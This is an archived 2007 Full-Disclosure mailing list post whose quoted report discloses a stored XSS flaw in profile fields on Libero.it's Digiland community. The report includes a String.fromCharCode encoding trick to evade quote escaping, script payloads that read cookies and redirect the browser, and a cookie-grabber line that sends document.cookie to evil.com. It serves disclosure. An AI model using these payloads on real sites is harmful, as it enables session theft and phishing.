lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 29 Mar 2007 09:03:45 -0400
From: Kradorex Xeron <admin@...ibase.ca>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Another XSS vulnerability in Italian provider
	Libero.it

They probably need to redo their entire site's scripts, I wouldn't doubt 
there's a few more exploits in there somewhere. -- 2+ exploits within one 
site in one month is pretty sad.

On Wednesday 28 March 2007 12:17, LK wrote:
> After the report of Rosario Valotta on this ML, another XSS vulnerability
> has been found on Libero.it, one of the most important italian ISP
> (www.libero.it).
>
> Nothing more than a trivial error but, since Libero.it staff used the
> printed media to inform that Rosario's find was just a "spot" issue, it is
> important to demonstrate that this kind of errors are quite more
> widespread and to let the Libero staff and management realize that a
> potential attack must be avoid by a deep check of the portal.
>
> The vulnerability once again can be found in the "Community" section
> of Libero portal, and the affected functionality is the profile
> creation and retrieval
>
> <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>.
>
> The implementation of this functionality allows the injection of
> malicious code in the profile, so that an attacker by visiting his/her
> profile can:
>
> 1) steal username (in cookie)
> 2) steal cookies
> 3) arbitrary redirection for Phishing purpose
>
> The normal URL would be something linked like this:
>
> http://digiland.libero.it/profilo.phtml?nick=Nick&top=1
>
> where "Nick" is the name of the nick whose profile has been
> manipulated or crafted to add arbitrary code.
>
> This vulnerability closely resemble to those in MySpace and other
> communities.
> So it's nothing really complicated and you can skip on from here on ;)
>
> In admin pages (need to be logged by creating a fake account) on page
>
> http://digiland.libero.it/profilo_add.php?nocache=1175076655
>
> there are two different fields named "I miei difetti:" (my defects)
> and "i miei pregi:" (my strong points) that accept arbitrary content.
>
> As stated by Rosario, the Libero.it web application performs a simple
> parsing of the posted content, so that quote and double-quote (' and ")
> chars are escaped by putting a \ before of them (both using ASCII and URL
> encoding).
>
> While I already had the Rosario's beautiful implementation of a simple
> evasion technique I preferred to encode the single char in an old
> snippet of mine.
> The aim of the snippet (I don't remember if I made it, stole it, stole
> only the main idea or where, sorry)  is to transform a string into a
> series of char numbers to be used with a String.fromCharCode command.
> Due to the limitation in size, the function which create the
> String.fromCharCode sequence is a detached and ascii value is
> decreased of 100 to limit the number of digits.
> This is the creation snippet:
>
>  <script>
>  var toBenc = "hettp://www.lastknight.com";
>  var result = "";
>
>   for (var k = 0; k < carlo.length; k++)
>  {
>          result += ("e(" + (toBenc .charCodeAt(k) - 100) + ")+");
>  }
>
>  document.write(result + "<br>")
>  </script>
>
>  So URL "http://www.lastknight.com" is rendered as:
>
> e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)
> +e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)
> +e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
>
>
> Using the two boxes we can use the following code for a POC:
>
>  [BOX 1]
>  <script>
>  function e(A) {
>   return String.fromCharCode(A + 100)
>  }
>  alert(document.cookie);
>  </script>
>
>  [BOX 2]
>  <script>
>  var k =
>  e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8);
>  k +=
>  e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
>  alert(k);
>  window.location = k;
>  </script>
>
> The posting url can be easily modified to an http grabber such as:
>
>  <http://evil.com/grab?c="+encodeURI(document.cookie);>
>
> or (much more dangerous) to a phishing site.
>
> Session Riding and derived problems have not been tested but many italian
> security experts are working on it.
>
> A POC url is available (until not deleted) here:
>
> <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>
>
> Just my 2 cents and thanks to:
>
> <Rosario Valotta> for the first report, upon which this is based
> <SharDick> for help in JS ;)
> <Vokda && Zen> for consultancy and typo-killing ;)
>
>
> Greetings,
>
> MgpF
>
>
> Permanent Url: <http://www.lastknight.com/libero-xss/>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists